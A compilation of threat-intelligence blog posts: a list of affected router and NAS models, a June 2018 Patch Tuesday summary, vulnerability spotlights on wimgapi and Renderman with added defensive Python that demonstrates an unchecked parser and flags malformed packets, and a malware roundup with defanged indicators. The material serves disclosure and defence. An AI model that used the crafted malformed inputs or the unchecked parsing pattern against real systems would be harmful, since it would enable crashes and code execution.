    d5dec646c957305d91303a1d7931b30e7fb2f38d54a1102e14fd7a4b9f6e0806
    c0f8bde03df3dec6e43b327378777ebc35d9ea8cfe39628f79f20b1c40c1b412

    Known Affected Devices



    The following devices are known to be affected by this threat. Given the scale of this research, many of our observations are remote rather than on the device, so it is difficult to determine specific version numbers and models in many cases.

    Given our observations with this threat, we assess that this list may still be incomplete and other devices may be affected.

    Asus Devices:

    RT-AC66U (new)
    RT-N10 (new)
    RT-N10E (new)
    RT-N10U (new)
    RT-N56U (new)
    RT-N66U (new)

    D-Link Devices:

    DES-1210-08P (new)
    DIR-300 (new)
    DIR-300A (new)
    DSR-250N (new)
    DSR-500N (new)
    DSR-1000 (new)
    DSR-1000N (new)

    Huawei Devices:

    HG8245 (new)

    Linksys Devices:

    E1200
    E2500
    E3000 (new)
    E3200 (new)
    E4200 (new)
    RV082 (new)
    WRVS4400N

    Mikrotik Devices:

    CCR1009 (new)
    CCR1016
    CCR1036
    CCR1072
    CRS109 (new)
    CRS112 (new)
    CRS125 (new)
    RB411 (new)
    RB450 (new)
    RB750 (new)
    RB911 (new)
    RB921 (new)
    RB941 (new)
    RB951 (new)
    RB952 (new)
    RB960 (new)
    RB962 (new)
    RB1100 (new)
    RB1200 (new)
    RB2011 (new)
    RB3011 (new)
    RB Groove (new)
    RB Omnitik (new)
    STX5 (new)



    Netgear Devices:

    DG834 (new)
    DGN1000 (new)
    DGN2200
    DGN3500 (new)
    FVS318N (new)
    MBRN3000 (new)
    R6400
    R7000
    R8000
    WNR1000
    WNR2000
    WNR2200 (new)
    WNR4000 (new)
    WNDR3700 (new)
    WNDR4000 (new)
    WNDR4300 (new)
    WNDR4300-TN (new)
    UTM50 (new)

    QNAP Devices:

    TS251
    TS439 Pro
    Other QNAP NAS devices running QTS software

    TP-Link Devices:

    R600VPN
    TL-WR741ND (new)
    TL-WR841N (new)

    Ubiquiti Devices:

    NSM2 (new)
    PBE M5 (new)

    Upvel Devices:

    Unknown Models* (new)

    ZTE Devices:

    ZXHN H108N (new)

    * Malware targeting Upvel as a vendor has been discovered, but we are unable to determine which specific device it is targeting.

    Microsoft Patch Tuesday - June 2018


    Executive Summary


    Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 50 flaws, with 11 of them rated "critical," and 39 rated "important." These vulnerabilities impact Microsoft Edge, Internet Explorer, Chakra Scripting Engine, Windows DNSAPI, Microsoft Office, Windows Kernel and more.

    In addition to the 50 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180014, the June 2018 Adobe Flash Security Update, which addresses the vulnerabilities described in the security bulletin.

    Critical vulnerabilities


    This month, Microsoft is addressing 11 vulnerabilities that are rated "critical." Talos believes these three vulnerabilities in particular are notable and require prompt attention.

    CVE-2018-8225 - Windows DNSAPI Remote Code Execution Vulnerability

    A remote code vulnerability is present within Windows DNS. This vulnerability manifests due to DNSAPI.dll improperly handling DNS responses. This vulnerability could allow a remote attacker to execute arbitrary code within the context of the LocalSystem account on affected systems. An attacker could leverage a malicious DNS server and send specially crafted DNS responses to trigger this vulnerability.

    CVE-2018-8229 - Chakra Scripting Engine Memory Corruption Vulnerability

    A remote code execution vulnerability is present within Microsoft Scripting Engine. This vulnerability manifests due to the Chakra engine improperly handling objects in memory. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker controlled webpage, or simply a page that hosts external content, such as advertisements.

    CVE-2018-8267 - Scripting Engine Memory Corruption Vulnerability

    A remote code execution vulnerability is present within Microsoft Scripting Engine. This vulnerability manifests due to the scripting engine not properly handling objects in memory in Internet Explorer. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability was publicly disclosed prior to a patch being made available.

    Other vulnerabilities deemed "critical" are listed below:

    Important vulnerabilities


    This month, Microsoft is addressing 39 vulnerabilities that are rated "important." One of these vulnerabilities is TALOS-2018-0545, which was assigned CVE-2018-8210. This vulnerability is a Windows remote code execution flaw that was discovered by Marcin Noga of Cisco Talos. Additional information related to this vulnerability can be found in the advisory report here.

    Additionally, Talos believes the following vulnerability is notable and requires prompt attention.

    CVE-2018-8227 - Chakra Scripting Engine Memory Corruption Vulnerability

    A remote code execution vulnerability is present within the Microsoft Scripting Engine. This vulnerability manifests due to the Chakra engine improperly handling objects in memory. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker controlled webpage, or simply a page that hosts external content, such as advertisements.

    Other vulnerabilities deemed "important" are listed below:

    Coverage


    In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released in the future, and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

    Snort Rules:
    • 45628, 46927 - 46930, 46933 - 46935, 46938 - 46945, 46951 - 46958, 46961 - 46962

    Vulnerability Spotlight: TALOS-2018-0545 - Microsoft wimgapi LoadIntegrityInfo Code Execution Vulnerability

    Vulnerabilities discovered by Marcin Noga from Talos

    Overview


    Talos is disclosing a remote code execution vulnerability in the Microsoft wimgapi library. The wimgapi DLL is used in the Microsoft Windows operating system to perform operations on Windows Imaging Format (WIM) files. WIM is a file-based disk image format created by Microsoft to simplify the deployment of Windows systems. If an attacker creates a specially crafted WIM file, they could execute malicious code with the same access rights as the logged-in user, or simply crash the system with a denial-of-service attack. The vulnerability is related to the file header parsing, which means it gets triggered even on simple operations. WIM files do not have a registered file type handler by default, which means that this vulnerability cannot be triggered by tricking a user into double-clicking a WIM file — at least not without registering a file handler first.

    Details

    The vulnerability exists in the LoadIntegrityInfo function and manifests during the parsing of a WIM file header. A specially crafted WIM file can lead to heap corruption and remote code execution.
    The vulnerability triggers even on the simplest operations performed on a malformed WIM file. For example, it is enough if an application tries to open the WIM file via the WIMCreateFile function and requests a file handle. The function allocates heap memory based on a user-controlled size value, and uses another user-controlled value to read n bytes from the file into this buffer. It uses these values without any prior input checks.
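    The pattern behind this bug, one attacker-controlled field sizing an allocation and a second, independent field sizing the read into it, is worth seeing next to its fix. The Python below is an added illustration for this post, not the wimgapi code and not the real WIM header layout: it defines a hypothetical 12-byte header (blob offset, allocation size, read length) so the same shape can be parsed both ways. In C the unchecked read runs past the allocation and corrupts the heap; in Python a bytearray silently grows instead, so the returned length makes the overrun visible. The checked parser ties the two fields to each other and to the file size before touching either. The sample files are constructed.

```python
import struct

# Hypothetical header for the demonstration (not the WIM format): little-endian
# blob offset, allocation size, and a separately supplied read length.
HEADER = struct.Struct("<III")
MAX_BLOB = 1 << 20          # assumed sane upper bound for one integrity blob


class MalformedHeader(ValueError):
    """Raised by the checked parser when the header fields are inconsistent."""


def load_blob_unchecked(file_bytes):
    """The unsafe pattern: allocate alloc_size, then read read_len bytes into it.

    Nothing relates read_len to alloc_size or to the file size. In C this is
    a heap overflow; here the bytearray grows past its 'allocation'.
    """
    offset, alloc_size, read_len = HEADER.unpack_from(file_bytes, 0)
    buf = bytearray(alloc_size)                       # the "allocation"
    chunk = file_bytes[offset:offset + read_len]      # reads read_len bytes
    buf[:len(chunk)] = chunk                          # may exceed alloc_size
    return buf


def load_blob_checked(file_bytes):
    """Validate every untrusted field before allocating or reading."""
    if len(file_bytes) < HEADER.size:
        raise MalformedHeader("truncated header")
    offset, alloc_size, read_len = HEADER.unpack_from(file_bytes, 0)
    if alloc_size == 0 or alloc_size > MAX_BLOB:
        raise MalformedHeader("allocation size out of range")
    if read_len > alloc_size:
        raise MalformedHeader("read length exceeds allocation")
    # In C, compute this bound in a wider type or check for wrap-around first.
    if offset < HEADER.size or offset + read_len > len(file_bytes):
        raise MalformedHeader("blob extends beyond end of file")
    buf = bytearray(alloc_size)
    buf[:read_len] = file_bytes[offset:offset + read_len]
    return buf


def make_file(offset, alloc_size, read_len, blob):
    """Constructed sample: header followed by padding and the blob at offset."""
    header = HEADER.pack(offset, alloc_size, read_len)
    return header + b"\x00" * (offset - len(header)) + blob


if __name__ == "__main__":
    benign = make_file(12, 16, 8, b"A" * 8)
    crafted = make_file(12, 8, 64, b"B" * 64)     # read_len far larger than alloc
    print("benign, checked  :", len(load_blob_checked(benign)), "bytes")
    print("crafted, unchecked:", len(load_blob_unchecked(crafted)), "bytes (> 8)")
    try:
        load_blob_checked(crafted)
    except MalformedHeader as exc:
        print("crafted, checked :", exc)
```

    The decisive check is `read_len > alloc_size`; the offset and file-size checks close the companion bug where a length field points past the end of the file and the parser reads uninitialized or out-of-bounds memory.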

    More technical details can be found in the Talos Vulnerability Reports.

    Coverage

    The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

    Snort Rule: 46055-46056,46058-46059

    Vulnerability Spotlight: TALOS-2018-0523-24 - Multiple Vulnerabilities in Pixars Renderman application

    Vulnerabilities discovered by Tyler Bohan from Talos


    Overview


    Talos is disclosing two denial-of-service vulnerabilities in Pixar's Renderman application. Renderman is a rendering application used in animation and film production. It is widely used for advanced rendering and shading in many large-scale environments. Both vulnerabilities are due to the lack of proper validation during the parsing process of network packets.

    Pixar remedied these vulnerabilities in RenderMan version 21.7.

    Details


    TALOS-2018-0523 / CVE-2018-3840

    An attacker could send a malformed TCP packet to port 4001 using the '0x67' command that is not followed by one of the four values (0x00 - 0x03) permitted for the subsequent byte. Due to a lack of input validation, this causes a null pointer dereference and a denial of service. You can read more details in the Talos Vulnerability Report.


    TALOS-2018-0524 / CVE-2018-3841

    This vulnerability is caused by a very similar issue as described in TALOS-2018-0523. The only difference is that a potential attacker supplies a packet containing the ‘0x69’ command, followed by more than one byte of data to trigger the vulnerability. You can read more details in the Talos Vulnerability Report.
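    Both reports describe the same missing step: the server trusts the byte(s) after the command without checking them. The following Python is an added example for this post, not Renderman code or a Talos rule; it applies the two constraints stated above to constructed payloads on port 4001 so a reader can see what the input validation should have rejected, or what a network monitor could flag. The framing is an assumption: the first payload byte is taken as the command and the rest as its data, since the post gives only the command bytes and the rules.

```python
RENDERMAN_PORT = 4001
CMD_0x67 = 0x67   # must be followed by one byte in 0x00..0x03 (TALOS-2018-0523)
CMD_0x69 = 0x69   # more than one byte of data triggers the crash (TALOS-2018-0524)


def check_command(payload):
    """Classify one payload; assumes byte 0 is the command, the rest is data."""
    if not payload:
        return "empty"
    cmd, data = payload[0], payload[1:]
    if cmd == CMD_0x67:
        if len(data) >= 1 and data[0] <= 0x03:
            return "ok"
        return "malformed-0x67"      # missing or out-of-range subsequent byte
    if cmd == CMD_0x69:
        if len(data) <= 1:
            return "ok"
        return "malformed-0x69"      # more than one data byte
    return "unchecked"               # other commands are outside the two reports


def flag_flows(flows, port=RENDERMAN_PORT):
    """Return [(index, verdict)] for flows to the Renderman port that fail a rule."""
    findings = []
    for i, (dst_port, payload) in enumerate(flows):
        if dst_port != port:
            continue
        verdict = check_command(payload)
        if verdict.startswith("malformed"):
            findings.append((i, verdict))
    return findings


# Constructed (destination port, payload) pairs.
SAMPLE_FLOWS = [
    (4001, b"\x67\x02"),          # valid 0x67 with permitted value
    (4001, b"\x67\x09"),          # 0x67 with a value outside 0x00..0x03
    (4001, b"\x67"),              # 0x67 with no subsequent byte at all
    (4001, b"\x69\x01"),          # valid 0x69 with one data byte
    (4001, b"\x69\x01\x02"),      # 0x69 with two data bytes
    (80, b"\x69\x01\x02"),        # same bytes to another service: ignored
    (4001, b"\x01\x00"),          # some other command: not checked here
]

if __name__ == "__main__":
    for i, verdict in flag_flows(SAMPLE_FLOWS):
        print(i, verdict, SAMPLE_FLOWS[i][1].hex())
```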

     

    Coverage


    The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.


    Snort Rule: 45610, 45604

    Threat Roundup for June 1-15



    Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 01 and June 15. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

    As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.


    The most prevalent threats highlighted in this round up are:

    • Win.Dropper.Johnnie-6567758-0
      Dropper
      Johnnie, also known as Mikey, is a malware family that focuses on persistence, and is known for its plugin architecture.
    • Win.Dropper.Yakes-6563213-0
      Dropper
      This malware family sets up persistence on target systems by adding a registry entry to HKLM\Software\Microsoft\CurrentUser\Run. It also uses netsh.exe to modify Windows Firewall rules to allow a DLL to communicate externally.
    • Win.Dropper.Prepscram-6571863-0
      Dropper
      Prepscram is a software bundler that may install other unwanted software.
    • Win.Dropper.Scar-6563211-0
      Dropper
      Scar is a remote access trojan that will attempt to steal users' login credentials on multiple financial websites.
    • Win.Dropper.Gandcrab-6574655-0
      Dropper
      Gandcrab is ransomware that targets Windows machines and requests payments using "Dash" in order to recover encrypted files. It is under almost constant development, with its creators releasing new versions at an aggressive pace. 

    Threats


    Win.Dropper.Johnnie-6567758-0



    Indicators of Compromise


    Registry Keys
    • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\4F8A903B98DDC9436D66B555E49D04A498A2C0E6
      • Value: Blob
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV\INSTANCES\WTBHOV INSTANCE
      • Value: Altitude
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WTBHOV\INSTANCES\WTBHOV INSTANCE
      • Value: Flags
    Mutexes
    • N/A
    IP Addresses
    • 45[.]77[.]68[.]17
    • 45[.]32[.]78[.]78
    • 45[.]63[.]57[.]87
    • 173[.]192[.]16[.]184
    • 174[.]37[.]56[.]249
    Domain Names
    • gpt9[.]com
    • optcdn[.]com
    • www[.]userbest[.]com
    • optitm[.]com
    Files and/or directories created
    File Hashes

    Coverage


    Screenshots of Detection

    AMP

    ThreatGrid

    Win.Dropper.Yakes-6563213-0



    Indicators of Compromise


    Registry Keys
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
      • Value: strght
    • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI
    • <HKLM>\System\CurrentControlSet\Services\NapAgent\Shas
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\Enroll\HcsGroups
    • <HKLM>\System\CurrentControlSet\Services\NapAgent\Qecs
    • <HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig
    Mutexes
    • N/A
    IP Addresses
    • N/A
    Domain Names
    • N/A
    Files and/or directories created
    • N/A
    File Hashes

    Coverage


    Screenshots of Detection

    AMP

    ThreatGrid

    Win.Dropper.Prepscram-6571863-0



    Indicators of Compromise


    Registry Keys
    • <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
      • Value: PnpInstanceID
    Mutexes
    • N/A
    IP Addresses
    • 52[.]85[.]146[.]150
    Domain Names
    • bush[.]basinafterthought[.]bid
    Files and/or directories created
    • N/A
    File Hashes

    Coverage


    Screenshots of Detection

    AMP

    ThreatGrid

    Win.Dropper.Scar-6563211-0



    Indicators of Compromise


    Registry Keys
    • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
      • Value: Shell
    • <HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY
      • Value: AddToFavoritesInitialSelection
    • <HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY
      • Value: AddToFeedsInitialSelection
    • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
    Mutexes
    • N/A
    IP Addresses
    • N/A
    Domain Names
    • N/A
    Files and/or directories created
    • %UserProfile%\kxyk.exe
    • %SystemDrive%\TEMP\papi.dmp
    File Hashes

    Coverage


    Screenshots of Detection

    AMP

    ThreatGrid

    Win.Dropper.Gandcrab-6574655-0



    Indicators of Compromise


    Registry Keys
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\SHELL EXTENSIONS\CACHED
      • Value: {ED50FC29-B964-48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\SHELL EXTENSIONS\CACHED
      • Value: {17FE9752-0B5A-4665-84CD-569794602F5C} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST
      • Value: CurrentLru
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
      • Value: DhcpDomain
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
      • Value: DhcpDefaultGateway
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
      • Value: DhcpSubnetMaskOpt
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
      • Value: DhcpNameServer
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
      • Value: SoHRequest
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
      • Value: DhcpInterfaceOptions
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
      • Value: CachePrefix
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: Sort
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: ColInfo
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: ItemPos1024x768x96(1)
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: GroupByDirection
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: LogicalViewMode
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: FFlags
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: GroupView
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: GroupByKey:PID
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: IconSize
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: ItemOrder
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: Mode
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: GroupCollapseState
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\1\DESKTOP
      • Value: GroupByKey:FMTID
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STUCKRECTS2
      • Value: Settings
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STREAMS\DESKTOP
      • Value: TaskbarWinXP
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{DBC80044-A445-435B-BC74-9C25C1C588A9}
      • Value: CompatBlockPromptCount
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{DBC80044-A445-435B-BC74-9C25C1C588A9}
      • Value: NewInstallPromptCount
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES
      • Value: KnownProvidersUpgradeTime
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES
      • Value: DownloadRetries
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES
      • Value: DefaultScope
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES
      • Value: DefaultPackCorrection
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
      • Value: CachePrefix
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1\Indexes
    • <HKLM>\SOFTWARE\WOW6432NODE\Microsoft
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Setup
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\Settings
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\0a-64-3c-54-a8-18
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\IndexTable
    • <HKU>\.DEFAULT\Software\Microsoft\Feeds
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\LowRegistry
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
    • <HKU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
    • <HKU>\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Recovery\AdminActive
    • <HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\Shadow Copy Optimization Writer
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\UrlBlockManager
    • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\Certificates
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\IETld\LowMic
    • <HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\CA
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
    • <HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-000000000046}\Enum
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\Main\WindowsSearch
    • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
    • <HKU>\.DEFAULT\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs
    • <HKLM>\SOFTWARE\CLASSES
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LruList
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\Component Categories64
    • <HKU>\.DEFAULT\Software\Microsoft\F12
    • <HKU>\.DEFAULT\Software
    • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DBC80044-A445-435B-BC74-9C25C1C588A9}
    • <HKU>\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Zones
    • <HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore
    • <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\0000000000000004
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\0000000000000001
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\Passport
    • <HKU>\.DEFAULT\SOFTWARE\APPDATALOW\SOFTWARE\Microsoft
    • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2\INDEXES\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}\0a-64-3c-54-a8-18
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{00021494-0000-0000-C000-000000000046}
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{00021493-0000-0000-C000-000000000046}
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}
    • <HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\Windows
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\10000000067F9
    • <HKU>\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Passport\LowDAMap
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites
    • <HKU>\.DEFAULT\Software\Microsoft\Internet Explorer\InternetRegistry
    • <HKU>\.DEFAULT\SOFTWARE\APPDATALOW\Software
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{00021494-0000-0000-C000-000000000046}\Enum
    • <HKLM>\Software\Microsoft\Windows\CurrentVersion\Reliability\shutdown
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLs
    • <HKU>\.DEFAULT\Software\Microsoft\SystemCertificates\Root
    • <HKU>\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\LowRegistry
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLs
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\3000000010875
